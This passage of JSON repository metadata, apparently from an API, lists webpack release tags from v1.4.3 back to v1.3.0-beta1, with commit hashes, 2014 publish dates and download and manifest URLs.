gs/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06